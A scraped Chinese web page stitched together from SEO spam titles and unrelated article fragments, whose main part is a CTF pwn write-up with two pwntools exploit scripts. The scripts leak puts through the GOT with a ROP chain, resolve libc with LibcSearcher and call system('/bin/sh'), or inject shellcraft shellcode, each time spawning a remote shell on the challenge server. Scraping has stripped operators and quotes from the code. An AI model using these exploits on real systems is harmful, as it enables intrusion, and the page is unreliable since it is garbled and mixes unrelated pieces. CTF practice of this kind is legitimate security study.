电商网站功能模块图重庆渝北网站建设-Seo优化-定安县网站建设公司

电商网站功能模块图,重庆渝北网站建设,中国企业公司网站建设,神一般的网页设计首先checksec检查保护状态#xff1a;-64位程序-几乎没有保护#xff0c;但是是NX保护未知#xff0c;后续需要验证接下来使用IDA反汇编工具进行分析#xff1a;没发现任何后门函数#xff0c;那么只能是注入shellcode或泄露libc#xff0c;这里发现第一个read可以输入数…首先checksec检查保护状态-64位程序-几乎没有保护但是是NX保护未知后续需要验证接下来使用IDA反汇编工具进行分析没发现任何后门函数那么只能是注入shellcode或泄露libc这里发现第一个read可以输入数据到name变量中然后再在下面的gets函数利用栈溢出漏洞跳转到name函数地址来执行shellcode想要注入shellcode这里得来验证一下name内存地址的权限-拿到name在bss段的地址在gdb中输入vmmap 0x601080发现这段内存地址只有读写功能不可执行shellcode注入不可用那么只剩libc泄露可用了这里需要用到rdi和ret的地址在linux终端输入以下指令ROPgadget --binary pwn --only pop|retret地址0x00000000004004c9rdi地址0x0000000000400713其中ret用于栈对齐rdi用于构造ROP链调用函数然后再在IDA中拿到main函数地址0x400636基本信息拿完后就可以开始写exp攻击脚本了由于这里shellcode注入不可用使用第一个read读取内容到name那里的那一行代码已经没有用处了随便输入一个字符都行接下来就是进行两次栈溢出第一次将puts的地址泄露出来配合LibcSearcher找到libc库算出libc基址然后得到system和/bin/sh地址第二次栈溢出在注入system函数就可以拿到shellfrom pwn import * from LibcSearcher import LibcSearcher context(archamd64, oslinux, log_leveldebug) #io process(./pwn) # 在本地运行程序。 # gdb.attach(io) # 启动 GDB io connect(node5.buuoj.cn,27399) # 与在线环境交互。 main_addr 0x400636 rdi_addr 0x400713 ret_addr 0x4004c9 elf ELF(./pwn) puts_got elf.got[puts] puts_plt elf.plt[puts] io.sendlineafter(btell me your name\n,b1) payload ba*40 p64(rdi_addr) p64(puts_got) p64(puts_plt) p64(main_addr) io.sendlineafter(bWhat do you want to say to me?\n,payload) puts_addr u64(io.recvline().strip().ljust(8,b\x00)) print(hex(puts_addr)) libc LibcSearcher(puts,puts_addr) libc_base puts_addr - libc.dump(puts) system_addr libc_base libc.dump(system) bin_sh_addr libc_base libc.dump(str_bin_sh) io.sendlineafter(btell me your name\n,b1) payload ba*40 p64(ret_addr) p64(rdi_addr) p64(bin_sh_addr) p64(system_addr) io.recvuntil(bWhat do you want to say to me?\n) io.sendline(payload) io.interactive()这是运行结果这里需要手动选择libc库64位程序就选择64位的libc库这里有可能会选到不适配的libc多选几次就可用了最后拿到shell后输入cat flag拿到flag最后如果变量name的那段内存地址有执行权限的话exp会简单得多这是代码基本思路就是在name的内存地址中注入shellcode然后再跳转到变量name那段内存地址中执行shellcodefrom pwn import * context(archamd64, oslinux, log_leveldebug) #io process(./pwn) # 在本地运行程序。 # gdb.attach(io) # 启动 GDB io connect(node5.buuoj.cn,27399) # 与在线环境交互。 aim_addr 0x601080 shellcode asm(shellcraft.sh()) io.recvuntil(btell me your name\n) io.sendline(shellcode) io.recvuntil(bWhat do you want to say to me?\n) payload ba*40 p64(aim_addr) io.sendline(payload) io.interactive()

小说网站怎么做流量怎样创建网站吉洋大鼓

写在前面车门焊死，考研将至，准备冲刺！我将持续为大家更新25最新真题解析！学得快的同学可以和我一起，全力冲刺～注意，目前我只发布最新年份的真题，其他年份的真题，一个是很…

张小明 2026/3/2 18:14:00 网站建设

品牌网站建设h5工程建设信息网站

Nord调色板如何解决多语言产品开发的色彩一致性难题【免费下载链接】nord An arctic, north-bluish color palette. 项目地址: https://gitcode.com/gh_mirrors/no/nord 在全球化的数字产品开发中，色彩一致性已成为影响用户体验的关键因素。Nord调色板作为一…

张小明 2026/3/2 12:31:57 网站建设

肇庆百度网站推广dede网站模板医疗

从零构建AI电商图像生成系统：ControlNet实战手册【免费下载链接】sd-webui-controlnet WebUI extension for ControlNet 项目地址: https://gitcode.com/gh_mirrors/sd/sd-webui-controlnet 在当今电商竞争激烈的环境中，商品图像质量直接决定了用…

张小明 2026/1/9 8:09:16 网站建设

做网站要找什么软件网站关键词词库怎么做

文章目录🚩 1 前言1.1 选题注意事项1.1.1 难度怎么把控？1.1.2 题目名称怎么取？1.2 选题推荐1.2.1 起因1.2.2 核心- 如何避坑(重中之重)1.2.3 怎么办呢？🚩2 选题概览🚩 3 项目概览题目1 : 深度学习社交距离检…

张小明 2026/1/8 0:57:13 网站建设

一般做门户网站多少钱wordpress如何上传图片

C 学习_基础知识一直想学习 C 这门编程语言，但感觉 C 总是没学牢靠一拖再拖，这几天根据网上教程，准备快速过下 C 基本语法。对于我来说，直接看文档自学，往往比看视频效率高些，相信有了 C 基础&#xff…

张小明 2026/1/8 0:57:12 网站建设

怎么自己开一个网站杭州知名网站建设

快速体验打开 InsCode(快马)平台 https://www.inscode.net输入框内输入如下内容： 为编程新手创建一个简单的个人博客网站，要求：1) 首页显示博客文章列表；2) 文章详情页；3) 关于我页面；4) 响应式设计适配手…

张小明 2026/1/9 21:59:49 网站建设